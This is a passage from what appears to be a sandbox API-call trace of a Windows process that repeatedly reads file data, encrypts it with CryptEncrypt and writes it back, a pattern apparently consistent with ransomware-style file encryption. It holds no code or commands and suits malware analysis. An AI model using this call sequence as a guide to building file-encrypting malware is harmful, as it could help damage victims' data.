lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.520] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.520] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.520] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.520] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.520] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.520] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.520] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.520] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.520] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.521] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.521] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.521] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.521] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.521] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.521] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.521] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.521] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.521] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.521] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.521] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.521] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.521] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.521] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.522] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.522] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.522] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.522] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.522] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.522] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.522] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.522] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.522] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.522] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.522] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.522] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.522] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.523] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.523] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.523] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.523] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.523] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.523] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.523] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.523] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.523] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.523] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.523] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.523] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.523] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.523] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.524] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.524] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.524] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.524] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.524] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.524] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.524] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.524] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.524] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.524] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.524] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.524] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.524] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.524] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.525] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.525] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.525] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.525] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.525] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.525] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.525] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.525] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.525] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.525] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.525] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.525] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.525] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.525] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.526] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.526] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.526] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.526] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.526] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.526] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.526] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.526] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.526] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.526] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.526] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.526] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.526] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.526] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.527] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.527] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.527] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.527] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.527] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0242.527] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.527] ReadFile (in: hFile=0x5d3c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0242.527] CryptEncrypt (in: 